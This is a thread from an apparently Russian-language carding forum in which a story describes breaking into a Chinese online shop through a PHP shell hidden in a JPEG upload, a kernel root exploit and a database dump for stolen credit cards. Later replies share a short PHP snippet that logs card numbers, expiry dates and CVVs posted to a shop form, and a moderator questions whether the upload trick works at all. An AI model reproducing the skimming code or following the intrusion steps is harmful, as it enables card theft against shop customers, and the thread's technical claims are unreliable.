Взлом китайского шопа

Messages
11
Reputation
6
Reaction score
12
Points
3
Привет всем! Пришло в голову в голову взломать китайский шоп.

28 Января 22:40

Этот взлом планировался не один день; обычный китайский онлайн шоп, таких полно в Интернете (даже очень много, стоит только поискать ;) ) Ежедневно тысячи пользователей проходили через этот сайт. "Да ты понимаешь сколько здесь картона!? - Со сильной злостью орал Саша, кинув пачку сигарет в монитор....". Надо было срочно взять себя в руки, а то все провалиться.
Сначала Саша пытался найти уязвимость на самом сайте, все безуспешно, он пытался загрузить шелл как картинку, но все безуспешно.

Забросив это дело он начал искать админку сайту, Red сразу начал проверять адреса сайта:


...Ждало очень сильное разочарование — «Error 404», таких страниц не существовало.
Тогда можно попробовать найти админ-панель через Google:

Но все безуспешно, тогда Саша решил исследовать сайт на наличие SQL Injection - результат был никаким...

Может тогда стоит воспользоваться инструментом madnet'a «Google madnet Scaner», и просканировать ресурс. Скрипт определил, что на сервере находится еще один сайт - *********.ch. Наверно это площадка одного из админом, где он учиться web-программированию.
Погуляв по страницам сайта, Саша нашел форму для регистрации.
Создав новый аккаунт, взломщик заметил, что есть возможность заливать фотографии на сервер.

«Хмммммм… а что если возможно выполнить php код?». Red быстро переименовал
shell.php на shell.php.jpg.

Парень уже начал радоваться, но в последний момент сайт выдал ошибку. Саша хотел уже оставить идею с картинкой, но решил попробовать еще один способ.
Открыв картинку в программе WinHex и перейдя в конец файла, он нашел значения «FF D9» и затер их нулями. После этого он вставил
свой php код в конец файла в формате ascii, а значения FF D9 добавил после кода. Залив картинку на сайт, скрипт заработал.
Шелл был доступен по адресу:


Так теперь стоит получить root на сервере, чтоб слить базу, а не смотреть на домашние фотки админа.

kioshi@localhost ~$: id

uid=10(kioshi) gid=10(kioshi) groups=10(kioshi) context=unconfined_u:system_r:hotplug_t:s0-s0:c0.c1023

kioshi@localhost ~$: uname -a

Так значить на хостинге крутиться очень старая версия ядра Linux 2.6.30, эксплоит найти не будет проблемой.

Залив эксплоит на сервер, Саша начал его компилировать:

kioshi@localhost ~$: gcc –sploit exploit.c

Так root мой, сейчас у меня есть доступ к главному сайтому.


root@localhost ~$: cat /usr/local/apache/conf/httpd.conf

Так, теперь я знаю где находить веб папка, пора сделать дамп базы.

root@localhost ~$: mysqldump -u root -p -f shop_ch > /etc/cc.txt

Слив базу себе на компьютер, Саша был уже уверен у него теперь очень много кредиток. Закрыв все окна, Red решил посмотреть на часы. Было 05:34. Пора было идти спать.


(c) Pra(KillaGramm) for carder.market
 
Last edited:

Сумрак

VIP member
Messages
808
Reputation
94
Reaction score
103
Points
43
одному мне кажется что тут нет логического окончания? :)
 

pup0k

Carder
Messages
94
Reputation
8
Reaction score
15
Points
8
За последнии пару суток посмотрел примерно 50-70 китай шопов, в 90% из них оплата идет через палку, СС там искать не стоит -) У остальных оплата СС, но опять же, те что принимают СС чаще всего унылы. Дай бог там в месяц 1 покупатель. Ну и конечно попадаются норм шопы, так что статья чиста для набива репы. Реально найти такой шоп новичку не реал. Я зарегался 4 января вроде, пока заново вникал в тему и т.д. и .т.п. Вообщем у меня на поиск дрявого шопа с картоном ушло порядка 3х недель. А так дрявых шопов много, =) только я вот не найду толковую статью по внедрению своего пхп кода, что б красть СС -) есть пару сладких магазов у меня, с еще более сладким картоном, в базах его нет, а пхп я не знаю.
 
Messages
11
Reputation
6
Reaction score
12
Points
3
<?
$EXP = $_POST['exp'];
$ID = $_POST['id'];
$CVV = $_POST['cvv']
$log = fopen("baza.php","a+");
fwrite($log,"<br> $EXP:$ID$CVV \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://'></head></html>";
?>

---------- Сообщение добавлено в 09:04 PM ---------- Предыдущее сообщение размещено в 09:04 PM ----------

Вот примерный код
 

pup0k

Carder
Messages
94
Reputation
8
Reaction score
15
Points
8
<?
$EXP = $_POST['exp'];
$ID = $_POST['id'];
$CVV = $_POST['cvv']
$log = fopen("baza.php","a+");
fwrite($log,"<br> $EXP:$ID$CVV \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://'></head></html>";
?>

---------- Сообщение добавлено в 09:04 PM ---------- Предыдущее сообщение размещено в 09:04 PM ----------

Вот примерный код
Отлично, если б ты еще объяснил что означает каждая строка, было б вообще шикарно -) И откуда мне потом забирать это СС ?
 

pup0k

Carder
Messages
94
Reputation
8
Reaction score
15
Points
8
С тобой общаться отказываюсь -) влепил мне минус, а статью тупо переделал из другой -) Что кста подтверждает мои слова, что таких шопов 1 на 1000 -)
Вбиваем в гугль "Этот взлом планировался не один день" и смотрим разные вариации этой статьи.
 
  • Like
Reactions: Otto

    Otto

    Points: 1
    No comments

McGrath

Moderator
Messages
1,007
Reputation
135
Reaction score
189
Points
63
Да вы с ума посходили.
Как JPG файл будет интерпретироваться PHP? Что за сказки?
90% сайтов допускают залить .jpg файл, и ничего, не залили же шелл ещё.
Видимо Вебмастер редкостный идиот, что добавил в .htaccess
AddType application/x-httpd-php .jpg
И кстате, мог последние байты не затирать. PHP чекает по заголовку файлу:
0xFF, 0xD8 и 0xFF, 0xC0. Могу ошибатся на счет цифр, не смотрел в точности.
После данных байтов можно записывать твой PHP код, и уже через LFI юзать багу, но не как ты описал.
 
Last edited:

h0d3

BANNED
Messages
13
Reputation
-1
Reaction score
1
Points
3
Please note, if you want to make a deal with this user, that it is blocked.
<?
$EXP = $_POST['exp'];
$ID = $_POST['id'];
$CVV = $_POST['cvv']
$log = fopen("baza.php","a+");
fwrite($log,"<br> $EXP:$ID$CVV \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://'></head></html>";
?>

---------- Сообщение добавлено в 09:04 PM ---------- Предыдущее сообщение размещено в 09:04 PM ----------

Вот примерный код

Как он у тебя работает?

Code:
$CVV = $_POST['cvv']
 

Al'Capone

VIP member
Messages
301
Reputation
27
Reaction score
50
Points
28
тс мозгоеб пропащий

не пишите так. он в январе говорил. попал в аварию. что в больнице. все хуева. и больше тут не появлялся. конечно надеюсь на лучшее.
пракила отличный мужик,
 
Top